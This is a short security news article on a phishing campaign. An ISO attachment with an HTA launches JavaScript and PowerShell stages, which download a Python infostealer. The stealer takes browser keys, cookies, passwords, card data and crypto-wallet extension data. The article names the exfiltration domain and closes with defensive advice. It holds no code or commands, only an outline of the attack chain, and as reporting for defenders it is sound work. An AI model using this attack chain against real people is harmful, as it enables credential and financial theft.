A sophisticated phishing attack has recently been discovered by threat analysts, featuring a stealthy infostealer malware that has the capability to exfiltrate a wide range of sensitive data. This malware goes beyond traditional data types like saved passwords, targeting session cookies, credit card information, Bitcoin-related extensions, and browsing history.
The attack methodology starts with a phishing email that prompts recipients to open an attached purchase order file. These emails often contain grammatical errors and come from fake addresses. The attachment includes an ISO disc image file, which houses an HTA file that can execute applications on the desktop without browser security limitations.
Once the HTA file is executed, a series of malicious payloads are activated. This includes the download and execution of an obfuscated JavaScript file, followed by a PowerShell file that retrieves a ZIP file from a remote server. Within this ZIP file lies a Python-based infostealer malware.
This malware is designed to collect a vast amount of browser information and files. It extracts MasterKeys from browsers like Chrome, Edge, Yandex, and Brave, captures session cookies, saved passwords, credit card information, browser histories, and data from Bitcoin-related browser extensions. Additionally, the malware targets PDF files and zips entire directories, sending the stolen data to various email addresses at the domain maternamedical.top.
The implications for cybersecurity are significant, as this attack represents a new level of data exfiltration threats. The wide range of data collection capabilities of the malware poses serious risks, potentially leading to further malicious activities like lateral movement or financial fraud. To combat such threats, Barracuda recommends implementing robust security protocols, continuous monitoring for suspicious activities, and providing employee education on potential threats.
Utilizing multi-layered email protection solutions that leverage AI and machine learning can help in detecting and blocking phishing attempts before they reach user inboxes. As cyber-criminals continue to evolve their methods, it is crucial for businesses to remain vigilant and proactive in their cybersecurity efforts.